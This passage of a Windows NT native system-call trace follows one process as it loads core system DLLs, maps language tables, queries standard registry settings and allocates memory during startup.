{Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00212 896 NtCreateSection (0xf001f, 0x0, {65536, 0}, 4, 67108864, 0, ... 16, ) == 0x0 00213 896 NtSecureConnectPort ( ("\Windows\ApiPort", {0, 2, 1, 1}, {24, 16, 0, 65536, 0, 0}, 1319736, {12, 0, 0}, 1241944, 44, ... 24, {24, 16, 0, 65536, 2424832, 18939904}, {0, 0, 0}, 200, 44, ) , {0, 2, 1, 1}, {24, 16, 0, 65536, 0, 0}, 1319736, {12, 0, 0}, 1241944, 44, ... 24, {24, 16, 0, 65536, 2424832, 18939904}, {0, 0, 0}, 200, 44, ) == 0x0 00214 896 NtClose (16, ... ) == 0x0 00215 896 NtQueryObject (24, Handle, 2, ... {Inherit=0,ProtectFromClose=0,}, -1, ) == 0x0 00216 896 NtSetInformationObject (24, Handle, {Inherit=0,ProtectFromClose=1,}, 256, ... ) == 0x0 00217 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00218 896 NtQueryVirtualMemory (-1, 0x250000, Basic, 28, ... {BaseAddress=0x250000,AllocationBase=0x250000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x40000,}, 0x0, ) == 0x0 00219 896 NtAllocateVirtualMemory (-1, 2424832, 0, 4096, 4096, 4, ... 2424832, 4096, ) == 0x0 00220 896 NtRequestWaitReplyPort (24, {28, 56, new_msg, 0, 1242260, 1242460, 2089900544, 1242184} (24, {28, 56, new_msg, 0, 1242260, 1242460, 2089900544, 1242184} "\210\6!\1\0\0\0\0eZ\221|\0\0\0\0\1\0\0\0\234\6!\1\4\0\0\0" ... {28, 56, reply, 0, 1252, 896, 81833, 0} "\370\374\27\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\234\6!\1\4\0\0\0" ) ... {28, 56, reply, 0, 1252, 896, 81833, 0} (24, {28, 56, new_msg, 0, 1242260, 1242460, 2089900544, 1242184} "\210\6!\1\0\0\0\0eZ\221|\0\0\0\0\1\0\0\0\234\6!\1\4\0\0\0" ... {28, 56, reply, 0, 1252, 896, 81833, 0} "\370\374\27\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\234\6!\1\4\0\0\0" ) ) == 0x0 00221 896 NtRegisterThreadTerminatePort (24, ... ) == 0x0 00222 896 NtAllocateVirtualMemory (-1, 1232896, 0, 4096, 4096, 260, ... 1232896, 4096, ) == 0x0 00223 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Terminal Server"}, ... 16, ) }, ... 16, ) == 0x0 00224 896 NtQueryValueKey (16, (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 00225 896 NtClose (16, ... ) == 0x0 00226 896 NtOpenSection (0x4, {24, 0, 0x40, 0, 0, (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionUnicode"}, ... 16, ) }, ... 16, ) == 0x0 00227 896 NtMapViewOfSection (16, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x260000), 0x0, 90112, ) == 0x0 00228 896 NtClose (16, ... ) == 0x0 00229 896 NtQueryDefaultLocale (0, 2089305000, ... ) == 0x0 00230 896 NtOpenSection (0x4, {24, 0, 0x40, 0, 0, (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionLocale"}, ... 16, ) }, ... 16, ) == 0x0 00231 896 NtMapViewOfSection (16, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x280000), 0x0, 249856, ) == 0x0 00232 896 NtClose (16, ... ) == 0x0 00233 896 NtOpenSection (0x5, {24, 0, 0x40, 0, 0, (0x5, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortkey"}, ... 16, ) }, ... 16, ) == 0x0 00234 896 NtMapViewOfSection (16, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x2c0000), 0x0, 266240, ) == 0x0 00235 896 NtQuerySection (16, Basic, 16, ... {BaseAddress=0x0,Attributes=0x800000,Size={0x40004, 0x0},}, 0x0, ) == 0x0 00236 896 NtClose (16, ... ) == 0x0 00237 896 NtOpenSection (0x4, {24, 0, 0x40, 0, 0, (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortTbls"}, ... 16, ) }, ... 16, ) == 0x0 00238 896 NtMapViewOfSection (16, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x310000), 0x0, 24576, ) == 0x0 00239 896 NtClose (16, ... ) == 0x0 00240 896 NtQueryVirtualMemory (-1, 0x7ffd2000, Basic, 28, ... {BaseAddress=0x7ffd2000,AllocationBase=0x7ffb0000,AllocationProtect=0x2,RegionSize=0x2000,State=0x1000,Protect=0x2,Type=0x40000,}, 0x0, ) == 0x0 00241 896 NtOpenSection (0x4, {24, 0, 0x40, 0, 0, (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortkey00000409"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00242 896 NtOpenSection (0x4, {24, 0, 0x40, 0, 0, (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionSortkey00000409"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00243 896 NtAllocateVirtualMemory (-1, 2428928, 0, 8192, 4096, 4, ... 2428928, 8192, ) == 0x0 00244 896 NtRequestWaitReplyPort (24, {24, 52, new_msg, 0, 7012468, 7929957, 3145776, 3145776} (24, {24, 52, new_msg, 0, 7012468, 7929957, 3145776, 3145776} "\210\6!\1\36\0\1\0\0\0\0\0\377\377\377\377\234\6!\1p\30\0\0" ... {24, 52, reply, 0, 1252, 896, 81834, 0} "\10P\30\0\36\0\1\0\0\0\0\0\377\377\377\377\234\6!\1p\30\0\0" ) ... {24, 52, reply, 0, 1252, 896, 81834, 0} (24, {24, 52, new_msg, 0, 7012468, 7929957, 3145776, 3145776} "\210\6!\1\36\0\1\0\0\0\0\0\377\377\377\377\234\6!\1p\30\0\0" ... {24, 52, reply, 0, 1252, 896, 81834, 0} "\10P\30\0\36\0\1\0\0\0\0\0\377\377\377\377\234\6!\1p\30\0\0" ) ) == 0x0 00245 896 NtRequestWaitReplyPort (24, {28, 56, new_msg, 0, 2089305760, 2090321376, 0, 0} (24, {28, 56, new_msg, 0, 2089305760, 2090321376, 0, 0} "\210\6!\1\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6!\18\6\0\0" ... {28, 56, reply, 0, 1252, 896, 81835, 0} "\250\202\26\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6!\18\6\0\0" ) ... {28, 56, reply, 0, 1252, 896, 81835, 0} (24, {28, 56, new_msg, 0, 2089305760, 2090321376, 0, 0} "\210\6!\1\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6!\18\6\0\0" ... {28, 56, reply, 0, 1252, 896, 81835, 0} "\250\202\26\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\234\6!\18\6\0\0" ) ) == 0x0 00246 896 NtProtectVirtualMemory (-1, (0x52e000), 96, 4, ... (0x52e000), 4096, 128, ) == 0x0 00247 896 NtProtectVirtualMemory (-1, (0x52e000), 4096, 128, ... (0x52e000), 4096, 4, ) == 0x0 00248 896 NtFlushInstructionCache (-1, 5431296, 96, ... ) == 0x0 00249 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "USER32.dll"}, ... 16, ) }, ... 16, ) == 0x0 00250 896 NtMapViewOfSection (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x7e410000), 0x0, 589824, ) == 0x0 00251 896 NtClose (16, ... ) == 0x0 00252 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "GDI32.dll"}, ... 16, ) }, ... 16, ) == 0x0 00253 896 NtMapViewOfSection (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77f10000), 0x0, 290816, ) == 0x0 00254 896 NtClose (16, ... ) == 0x0 00255 896 NtProtectVirtualMemory (-1, (0x77f11000), 508, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00256 896 NtProtectVirtualMemory (-1, (0x77f11000), 4096, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00257 896 NtFlushInstructionCache (-1, 2012286976, 508, ... ) == 0x0 00258 896 NtProtectVirtualMemory (-1, (0x77f11000), 508, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00259 896 NtProtectVirtualMemory (-1, (0x77f11000), 4096, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00260 896 NtFlushInstructionCache (-1, 2012286976, 508, ... ) == 0x0 00261 896 NtProtectVirtualMemory (-1, (0x77f11000), 508, 4, ... (0x77f11000), 4096, 32, ) == 0x0 00262 896 NtProtectVirtualMemory (-1, (0x77f11000), 4096, 32, ... (0x77f11000), 4096, 4, ) == 0x0 00263 896 NtFlushInstructionCache (-1, 2012286976, 508, ... ) == 0x0 00264 896 NtProtectVirtualMemory (-1, (0x7e411000), 1252, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00265 896 NtProtectVirtualMemory (-1, (0x7e411000), 4096, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00266 896 NtFlushInstructionCache (-1, 2118193152, 1252, ... ) == 0x0 00267 896 NtProtectVirtualMemory (-1, (0x7e411000), 1252, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00268 896 NtProtectVirtualMemory (-1, (0x7e411000), 4096, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00269 896 NtFlushInstructionCache (-1, 2118193152, 1252, ... ) == 0x0 00270 896 NtProtectVirtualMemory (-1, (0x7e411000), 1252, 4, ... (0x7e411000), 4096, 32, ) == 0x0 00271 896 NtProtectVirtualMemory (-1, (0x7e411000), 4096, 32, ... (0x7e411000), 4096, 4, ) == 0x0 00272 896 NtFlushInstructionCache (-1, 2118193152, 1252, ... ) == 0x0 00273 896 NtProtectVirtualMemory (-1, (0x52e000), 96, 4, ... (0x52e000), 4096, 64, ) == 0x0 00274 896 NtProtectVirtualMemory (-1, (0x52e000), 4096, 64, ... (0x52e000), 4096, 4, ) == 0x0 00275 896 NtFlushInstructionCache (-1, 5431296, 96, ... ) == 0x0 00276 896 NtQueryInformationProcess (-1, 37, 48, ... {process info, class 37, size 48}, 0x0, ) == 0x0 00277 896 NtSetInformationProcess (-1, 34, {process info, class 34, size 4}, 4, ... ) == 0x0 00278 896 NtOpenProcessToken (-1, 0x8, ... 16, ) == 0x0 00279 896 NtQueryInformationToken (16, Statistics, 56, ... {token info, class 10, size 56}, 56, ) == 0x0 00280 896 NtClose (16, ... ) == 0x0 00281 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Terminal Server"}, ... 16, ) }, ... 16, ) == 0x0 00282 896 NtQueryValueKey (16, (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (16, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 00283 896 NtClose (16, ... ) == 0x0 00284 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDI32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00285 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USER32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00286 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00287 896 NtRequestWaitReplyPort (24, {28, 56, new_msg, 0, 2089900645, 2012282880, 2090320576, 1242028} (24, {28, 56, new_msg, 0, 2089900645, 2012282880, 2090320576, 1242028} "\210\6!\1\0\0\0\0\344\0\23\0\4\0\0\0\3\0\0\0\234\6!\1$\1\0\0" ... {28, 56, reply, 0, 1252, 896, 81836, 0} "\320G\26\0\0\0\0\0\0\0\0\0\4\0\0\0\3\0\0\0\234\6!\1$\1\0\0" ) ... {28, 56, reply, 0, 1252, 896, 81836, 0} (24, {28, 56, new_msg, 0, 2089900645, 2012282880, 2090320576, 1242028} "\210\6!\1\0\0\0\0\344\0\23\0\4\0\0\0\3\0\0\0\234\6!\1$\1\0\0" ... {28, 56, reply, 0, 1252, 896, 81836, 0} "\320G\26\0\0\0\0\0\0\0\0\0\4\0\0\0\3\0\0\0\234\6!\1$\1\0\0" ) ) == 0x0 00288 896 NtFsControlFile (12, 0, 0x0, 0x0, 0x90028, 0x0, 0, 0, ... {status=0x0, info=0}, 0x0, ) == 0x0 00289 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager"}, ... 16, ) }, ... 16, ) == 0x0 00290 896 NtQueryValueKey (16, (16, "SafeDllSearchMode", Partial, 16, ... ) , Partial, 16, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00291 896 NtClose (16, ... ) == 0x0 00292 896 NtAllocateVirtualMemory (-1, 1323008, 0, 4096, 4096, 4, ... 1323008, 4096, ) == 0x0 00293 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1239420, ... ) }, 1239420, ... ) == 0x0 00294 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 5, 96, ... 16, {status=0x0, info=1}, ) }, 5, 96, ... 16, {status=0x0, info=1}, ) == 0x0 00295 896 NtCreateSection (0xe, 0x0, 0x0, 16, 134217728, 16, ... 28, ) == 0x0 00296 896 NtClose (16, ... ) == 0x0 00297 896 NtMapViewOfSection (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x540000), 0x0, 110592, ) == 0x0 00298 896 NtClose (28, ... ) == 0x0 00299 896 NtUnmapViewOfSection (-1, 0x540000, ... ) == 0x0 00300 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1239328, ... ) }, 1239328, ... ) == 0x0 00301 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 5, 96, ... 28, {status=0x0, info=1}, ) }, 5, 96, ... 28, {status=0x0, info=1}, ) == 0x0 00302 896 NtCreateSection (0xe, 0x0, 0x0, 16, 134217728, 28, ... 16, ) == 0x0 00303 896 NtClose (28, ... ) == 0x0 00304 896 NtMapViewOfSection (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x540000), 0x0, 110592, ) == 0x0 00305 896 NtClose (16, ... ) == 0x0 00306 896 NtUnmapViewOfSection (-1, 0x540000, ... ) == 0x0 00307 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1239636, ... ) }, 1239636, ... ) == 0x0 00308 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 5, 96, ... 16, {status=0x0, info=1}, ) }, 5, 96, ... 16, {status=0x0, info=1}, ) == 0x0 00309 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 16, ... 28, ) == 0x0 00310 896 NtQuerySection (28, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 00311 896 NtOpenProcessToken (-1, 0x8, ... 32, ) == 0x0 00312 896 NtQueryInformationToken (32, User, 136, ... {token info, class 1, size 36}, 36, ) == 0x0 00313 896 NtOpenKey (0x3, {24, 0, 0x40, 0, 0, (0x3, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00314 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 36, ) }, ... 36, ) == 0x0 00315 896 NtQueryValueKey (36, (36, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (36, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 00316 896 NtClose (36, ... ) == 0x0 00317 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 00318 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 36, ) == 0x0 00319 896 NtQueryInformationToken (36, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 00320 896 NtClose (36, ... ) == 0x0 00321 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00322 896 NtClose (32, ... ) == 0x0 00323 896 NtClose (16, ... ) == 0x0 00324 896 NtMapViewOfSection (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76390000), 0x0, 118784, ) == 0x0 00325 896 NtClose (28, ... ) == 0x0 00326 896 NtProtectVirtualMemory (-1, (0x76391000), 696, 4, ... (0x76391000), 4096, 32, ) == 0x0 00327 896 NtProtectVirtualMemory (-1, (0x76391000), 4096, 32, ... (0x76391000), 4096, 4, ) == 0x0 00328 896 NtFlushInstructionCache (-1, 1983451136, 696, ... ) == 0x0 00329 896 NtProtectVirtualMemory (-1, (0x76391000), 696, 4, ... (0x76391000), 4096, 32, ) == 0x0 00330 896 NtProtectVirtualMemory (-1, (0x76391000), 4096, 32, ... (0x76391000), 4096, 4, ) == 0x0 00331 896 NtFlushInstructionCache (-1, 1983451136, 696, ... ) == 0x0 00332 896 NtProtectVirtualMemory (-1, (0x76391000), 696, 4, ... (0x76391000), 4096, 32, ) == 0x0 00333 896 NtProtectVirtualMemory (-1, (0x76391000), 4096, 32, ... (0x76391000), 4096, 4, ) == 0x0 00334 896 NtFlushInstructionCache (-1, 1983451136, 696, ... ) == 0x0 00335 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "ADVAPI32.dll"}, ... 28, ) }, ... 28, ) == 0x0 00336 896 NtMapViewOfSection (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77dd0000), 0x0, 634880, ) == 0x0 00337 896 NtClose (28, ... ) == 0x0 00338 896 NtProtectVirtualMemory (-1, (0x77dd1000), 1700, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00339 896 NtProtectVirtualMemory (-1, (0x77dd1000), 4096, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00340 896 NtFlushInstructionCache (-1, 2010976256, 1700, ... ) == 0x0 00341 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "RPCRT4.dll"}, ... 28, ) }, ... 28, ) == 0x0 00342 896 NtMapViewOfSection (28, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77e70000), 0x0, 593920, ) == 0x0 00343 896 NtClose (28, ... ) == 0x0 00344 896 NtAllocateVirtualMemory (-1, 1228800, 0, 4096, 4096, 260, ... 1228800, 4096, ) == 0x0 00345 896 NtProtectVirtualMemory (-1, (0x77e71000), 868, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00346 896 NtProtectVirtualMemory (-1, (0x77e71000), 4096, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00347 896 NtFlushInstructionCache (-1, 2011631616, 868, ... ) == 0x0 00348 896 NtProtectVirtualMemory (-1, (0x77e71000), 868, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00349 896 NtProtectVirtualMemory (-1, (0x77e71000), 4096, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00350 896 NtFlushInstructionCache (-1, 2011631616, 868, ... ) == 0x0 00351 896 NtProtectVirtualMemory (-1, (0x77e71000), 868, 4, ... (0x77e71000), 4096, 32, ) == 0x0 00352 896 NtProtectVirtualMemory (-1, (0x77e71000), 4096, 32, ... (0x77e71000), 4096, 4, ) == 0x0 00353 896 NtFlushInstructionCache (-1, 2011631616, 868, ... ) == 0x0 00354 896 NtProtectVirtualMemory (-1, (0x77dd1000), 1700, 4, ... (0x77dd1000), 4096, 32, ) == 0x0 00355 896 NtProtectVirtualMemory (-1, (0x77dd1000), 4096, 32, ... (0x77dd1000), 4096, 4, ) == 0x0 00356 896 NtFlushInstructionCache (-1, 2010976256, 1700, ... ) == 0x0 00357 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RPCRT4.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00358 896 NtAllocateVirtualMemory (-1, 1327104, 0, 4096, 4096, 4, ... 1327104, 4096, ) == 0x0 00359 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ADVAPI32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00360 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Terminal Server"}, ... 28, ) }, ... 28, ) == 0x0 00361 896 NtQueryValueKey (28, (28, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (28, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 00362 896 NtQueryValueKey (28, (28, "TSUserEnabled", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (28, "TSUserEnabled", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 00363 896 NtClose (28, ... ) == 0x0 00364 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"}, ... 28, ) }, ... 28, ) == 0x0 00365 896 NtQueryValueKey (28, (28, "LeakTrack", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00366 896 NtClose (28, ... ) == 0x0 00367 896 NtOpenKey (0x2000000, {24, 0, 0x40, 0, 0, (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\MACHINE"}, ... 28, ) }, ... 28, ) == 0x0 00368 896 NtSetInformationObject (28, Handle, {Inherit=0,ProtectFromClose=1,}, 2011431168, ... ) == 0x0 00369 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\Diagnostics"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00370 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMM32.DLL"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00371 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00372 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1236552, ... ) }, 1236552, ... ) == 0x0 00373 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntdll.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00374 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kernel32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00375 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\IMM32.DLL"}, 1239956, ... ) }, 1239956, ... ) == 0x0 00376 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Error Message Instrument\"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00377 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize"}, ... 16, ) }, ... 16, ) == 0x0 00378 896 NtQueryValueKey (16, (16, "DisableMetaFiles", Partial, 20, ... ) , Partial, 20, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00379 896 NtClose (16, ... ) == 0x0 00380 896 NtMapViewOfSection (-2147481368, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x540000), 0x0, 1060864, ) == 0x0 00381 896 NtClose (-2147481368, ... ) == 0x0 00382 896 NtCreateEvent (0x1f0003, 0x0, 1, 0, ... 16, ) == 0x0 00383 896 NtOpenThreadTokenEx (-2, 0x8, 1, 512, ... ) == STATUS_NO_TOKEN 00384 896 NtOpenProcessTokenEx (-1, 0x8, 512, ... -2147481368, ) == 0x0 00385 896 NtQueryInformationToken (-2147481368, Statistics, 0, ... ) == STATUS_BUFFER_TOO_SMALL 00386 896 NtQueryInformationToken (-2147481368, Statistics, 56, ... {token info, class 10, size 56}, 56, ) == 0x0 00387 896 NtClose (-2147481368, ... ) == 0x0 00388 896 NtAllocateVirtualMemory (-1, 0, 0, 32, 4096, 4, ... 4128768, 4096, ) == 0x0 00389 896 NtFreeVirtualMemory (-1, (0x3f0000), 4096, 32768, ... (0x3f0000), 4096, ) == 0x0 00390 896 NtDuplicateObject (-1, 32, -1, 0x0, 0, 2, ... 40, ) == 0x0 00391 896 NtOpenKey (0x20019, {24, 0, 0x240, 0, 0, (0x20019, {24, 0, 0x240, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Compatibility32"}, ... -2147481368, ) }, ... -2147481368, ) == 0x0 00392 896 NtQueryValueKey (-2147481368, (-2147481368, "packed", Partial, 172, ... ) , Partial, 172, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00393 896 NtClose (-2147481368, ... ) == 0x0 00394 896 NtOpenKey (0x20019, {24, 0, 0x240, 0, 0, (0x20019, {24, 0, 0x240, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\IME Compatibility"}, ... -2147481368, ) }, ... -2147481368, ) == 0x0 00395 896 NtQueryValueKey (-2147481368, (-2147481368, "packed", Partial, 172, ... ) , Partial, 172, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00396 896 NtClose (-2147481368, ... ) == 0x0 00397 896 NtQueryDefaultLocale (0, -135747252, ... ) == 0x0 00398 896 